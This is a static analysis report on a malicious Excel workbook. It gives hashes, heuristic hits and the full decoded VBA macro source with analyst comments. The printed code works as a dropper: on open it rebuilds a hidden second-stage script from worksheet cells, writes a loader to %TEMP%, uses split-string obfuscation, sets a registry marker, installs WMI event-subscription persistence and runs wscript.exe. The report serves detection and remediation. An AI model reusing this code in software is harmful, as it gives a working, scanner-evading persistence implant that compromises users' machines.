Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 543746b2c5b65206…

MALICIOUS

Office (OLE) / .XLS

252.0 KB Created: 2018-10-31 08:57:54 Authoring application: WPS 表格 First seen: 2026-06-20
MD5: 771b0b1417a5adccaba818ad13b4a269 SHA-1: ce0cf3f7830a64c45c02a0a46eee4f69de07ed38 SHA-256: 543746b2c5b6520637915539b5c717cb461dbb5696375000f1363598dfc93a91
496 Risk Score

Heuristics 12

  • ClamAV: Xls.Downloader.Generic-6923172-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Generic-6923172-0
  • VBA macros detected medium 9 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
      txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
      Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
      vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
      vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
      Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
      gPath = Environ("TEMP")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6477 bytes
SHA-256: f64b69d8b498ae803886412645e4b45b1ad4b53f8e788c5c8c3f8d40b405812a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header for ThisWorkbook, the document module. This is the copy of Workbook_Open that
' Excel actually runs on open (finding OLE_VBA_WBOPEN); the duplicate in the Sheet4 module below
' is not wired to any auto-exec event.
' Workbook_Open (ThisWorkbook) — runs automatically when the workbook is opened.
' Analyst summary: assembles a second-stage script from worksheet cells, drops it and a small
' VBScript loader under %TEMP%, installs a WMI permanent event subscription (wmiserv), writes a
' marker registry value, then launches the loader with wscript.exe. Host artifacts are noted inline.
Private Sub Workbook_Open()
  On Error Resume Next                      ' every failure is swallowed, so partial installs are possible
  Dim gPath As String, str As String        ' str is declared but never used in this handler
  gPath = Environ("TEMP")                   ' staging directory is %TEMP% (finding OLE_VBA_ENVIRON)
  ChDrive "C"
  ChDir gPath
  ' Payload is split across column Z, rows 1..180, of a worksheet named " " (a single space), so
  ' no single cell or string literal contains the full script.
  For i = 1 To 180
    dmStr = dmStr & Sheets(" ").Range("z" & i).Text
  Next
  
  DMpath = gPath & "\DM6331.TMP"            ' artifact: %TEMP%\DM6331.TMP — the assembled second-stage text
  VBSpath = gPath & "\rknrl.vbs"            ' artifact: %TEMP%\rknrl.vbs — the loader
  
  Open DMpath For Output As #1
  Print #1, dmStr
  Close #1
  
  ' Loader text: opens DM6331.TMP from the loader's own folder in read mode, reads it all and
  ' passes the text to VBScript execute(); it contains no URL itself.
  vbsStr = "On Error Resume Next:Dim f,FR,RF:Set f = CreateObject(""Scripting.FileSystemObject""):Set FR = f.OpenTextFile(f.GetFile(Wscript.ScriptFullName).ParentFolder.Path&""\DM6331.TMP"",1,False, - 2):RF = FR.ReadALL():execute (RF)"
  
  Open VBSpath For Output As #2
  Print #2, vbsStr
  Close #2
  
  wmiserv dmStr, vbsStr                     ' persistence: WMI event subscription (see wmiserv / WmiConsumer)
  Application.Wait (Now + TimeValue("0:00:01"))
  
  ' Marker value HKLM\SOFTWARE\Microsoft\rknrl\wspr is created once with "E<month>-<day>"; the WMI
  ' consumer script built in wmiserv reads and re-creates the same value.
  Const HKEY_LOCAL_MACHINE = &H80000002
  Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
  oReg.GetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", strValue

  If strValue = "" Then
    oReg.SetStringValue HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\rknrl", "wspr", "E" & Month(Now()) & "-" & Day(Now())
  End If
  

  ' Execution: Excel spawns wscript.exe (//B = batch mode, no prompts) on the dropped loader.
  ' Detection angle: office process -> wscript.exe with a %TEMP%\*.vbs argument.
  Shell "wscript.exe //B " & Chr(34) & VBSpath & Chr(34)
End Sub

' wmiserv — builds the VBScript that the WMI event consumer will run and hands it to WmiConsumer().
' That script re-drops DM6331.TMP and rknrl.vbs under %temp% and re-launches the loader, so
' deleting the two files alone does not remediate; the subscription in root\subscription must go too.
' DM:  assembled second-stage text (embedded verbatim into the consumer script)
' VBS: loader text (embedded verbatim into the consumer script)
' Return value is never set; callers ignore it.
Function wmiserv(DM, VBS)
  On Error Resume Next
  Dim objConn As Object, nslink As String
  ' Namespace string "winmgmts:\\.\root\subscription" is assembled from fragments so no single
  ' literal matches a keyword scanner (finding OLE_VBA_SPLIT_KEYWORD_OBFUSCATION).
  nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
  Set objConn = GetObject(nslink)
  
  ' Double every quote so both texts can be nested inside the consumer script's string literals.
  DM = Replace(DM, """", """""")
  VBS = Replace(VBS, """", """""")
  
  ' Consumer script, part 1: WScript.Shell, FileSystemObject and a root\cimv2 handle (the Wmi
  ' object is created but never used), then resolve %temp%\ as the drop directory.
  txt = "On Error Resume Next:Dim Fso,WShell,objFile,Wmi:Set WShell = CreateObject(""WScript.Shell""):Set FSO = CreateObject(""Scripting.Filesystemobject""):Set Wmi=getobject(""winmgmts:\\.\root\cimv2""):dir = WShell.expandenvironmentstrings(""%temp%"") & ""\"":DMtxt = """
  ' Part 2: rewrite %temp%\DM6331.TMP with the embedded second-stage text.
  txt = txt & DM & """:Set objFile = Fso.CreateTextFile(dir&""DM6331.TMP"",True,False):objFile.write DMtxt:objFile.close:VBStxt = """
  ' Part 3: rewrite %temp%\rknrl.vbs, run it via "wscript.exe //B", and (re)create the marker
  ' HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr as REG_SZ when it is empty.
  txt = txt & VBS & """:Set objFile = Fso.CreateTextFile(dir&""rknrl.vbs"",True,False):objFile.write VBStxt:objFile.close:WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr""):if wspr = """" then:WShell.regwrite ""HKEY_LOCAL_MACHINE\software\Microsoft\rknrl\wspr"", ""E""&Month(now())&""-""&Day(now()), ""REG_SZ"":end if"

  WmiConsumer objConn, txt, "rknrl"       ' consumer is registered as "rknrl_consumer"

End Function

' WmiConsumer — registers a WMI permanent event subscription that runs txt as VBScript on a timer.
' objConn:  SWbemServices bound to root\subscription
' txt:      VBScript source to run
' consumer: name prefix for the ActiveScriptEventConsumer ("<consumer>_consumer")
' Timer and filter names use the hard-coded prefix "rknrl", not the consumer argument.
' Artifacts to hunt / remove in root\subscription: ActiveScriptEventConsumer "rknrl_consumer",
' __IntervalTimerInstruction "rknrl_itimer", __EventFilter "rknrl_filter" and the
' __FilterToConsumerBinding joining them. Sysmon WMI events (19/20/21) record these registrations.
Function WmiConsumer(objConn, txt, consumer)
  On Error Resume Next
  dn = "rknrl"
  runinterval = 1000                        ' timer period; WMI timer intervals are in milliseconds
  stxt = txt
  ' Class names are concatenated from fragments to evade keyword scanning.
  Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
  asec.Name = consumer & "_consumer"
  asec.scriptingengine = "vbscript"
  asec.ScriptText = stxt                    ' the script runs under the WMI host, not under Excel
  Set asecpath = asec.put_
  Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
  itimer.timerid = dn & "_itimer"
  itimer.intervalbetweenevents = runinterval
  itimer.skipifpassed = False
  itimer.put_
  ' Filter fires on every __TimerEvent raised by the timer above.
  Set evtflt = objConn.Get("__EventFilter").spawninstance_
  evtflt.Name = dn & "_filter"
  evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
  evtflt.querylanguage = "wql"
  Set fltpath = evtflt.put_
  ' Binding activates the subscription; without it neither filter nor consumer does anything.
  Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
  fcbnd.consumer = asecpath.Path
  fcbnd.Filter = fltpath.Path
  fcbnd.put_
End Function




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1–Sheet3: module headers only, no procedures. Note that the sheet holding the staged
' payload is referenced by name from code (" " and "test"), not by one of these module names.

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet4 module. The Workbook_Open / wmiserv / WmiConsumer copies that follow live in a sheet
' module, where Workbook_Open is not an auto-exec event; they read as an earlier or test revision
' of the ThisWorkbook code (placeholder strings, no registry marker, loader named zz123.vbs).
' Workbook_Open (Sheet4 variant) — same dropper pattern as the ThisWorkbook copy but simpler:
' no On Error, no WMI persistence call, no registry marker, and the loader text comes from a cell.
' In a sheet module this procedure has no automatic trigger; treat it as a development leftover.
Private Sub Workbook_Open()
  Dim gPath As String, str As String
  gPath = Environ("TEMP")                   ' staging directory is %TEMP%

  ' Second-stage text is read from column Z, rows 1..100, of a sheet named "test".
  For i = 1 To 100
     str = str & Sheets("test").Range("z" & i).Text
  Next
  
  'str = "msgbox ""ssfff"""
  
  Open gPath & "\DM6331.TMP" For Output As #1   ' artifact: %TEMP%\DM6331.TMP
  Print #1, str
  Close #1
  
  ' Loader is whatever text sits in cell A1 of sheet "test"; dropped as %TEMP%\zz123.vbs.
  Open gPath & "\zz123.vbs" For Output As #2
  Print #2, Sheets("test").Range("a1").Text
  Close #2
  
  
  
  ' Launch via wscript.exe, here without the //B batch switch used by the ThisWorkbook copy.
  Shell "wscript.exe " & """" & gPath & "\zz123.vbs" & """"
  

End Sub
' wmiserv (Sheet4 variant) — registers the WMI subscription with a placeholder script ("ttttt")
' instead of a real payload. Not called from this module's Workbook_Open; looks like a test stub.
' Takes no arguments and sets no return value.
Function wmiserv()
Dim objConn As Object, nslink As String
' Same fragment-assembled "winmgmts:\\.\root\subscription" namespace as the ThisWorkbook copy.
nslink = "winmgm" & "ts:\\." & "\root\" & "subscr" & "iption"
Set objConn = GetObject(nslink)
txt = "ttttt"                             ' placeholder consumer script; has no effect if run
WmiConsumer objConn, txt, "rknrl"
End Function

' WmiConsumer (Sheet4 variant) — identical in structure to the ThisWorkbook copy; the only
' functional difference is runinterval = 10000 instead of 1000.
' objConn:  SWbemServices bound to root\subscription
' txt:      VBScript source the ActiveScriptEventConsumer will run
' consumer: name prefix for the consumer ("<consumer>_consumer"); timer/filter use "rknrl"
' Artifacts created: "rknrl_consumer", "rknrl_itimer", "rknrl_filter" and their binding.
Function WmiConsumer(objConn, txt, consumer)
On Error Resume Next
dn = "rknrl"
runinterval = 10000                       ' timer period; WMI timer intervals are in milliseconds
stxt = txt
' Class names are concatenated from fragments to evade keyword scanning.
Set asec = objConn.Get("Active" & "Script" & "EventC" & "onsumer").spawninstance_
asec.Name = consumer & "_consumer"
asec.scriptingengine = "vbscript"
asec.ScriptText = stxt
Set asecpath = asec.put_
Set itimer = objConn.Get("__Inter" & "valTim" & "erInst" & "ruction").spawninstance_
itimer.timerid = dn & "_itimer"
itimer.intervalbetweenevents = runinterval
itimer.skipifpassed = False
itimer.put_
' Filter selects every __TimerEvent from the timer above.
Set evtflt = objConn.Get("__EventFilter").spawninstance_
evtflt.Name = dn & "_filter"
evtflt.Query = "select * from __timerevent where timerid=""" & dn & "_itimer"""
evtflt.querylanguage = "wql"
Set fltpath = evtflt.put_
' Binding activates the subscription.
Set fcbnd = objConn.Get("__Filter" & "ToConsumer" & "Binding").spawninstance_
fcbnd.consumer = asecpath.Path
fcbnd.Filter = fltpath.Path
fcbnd.put_
End Function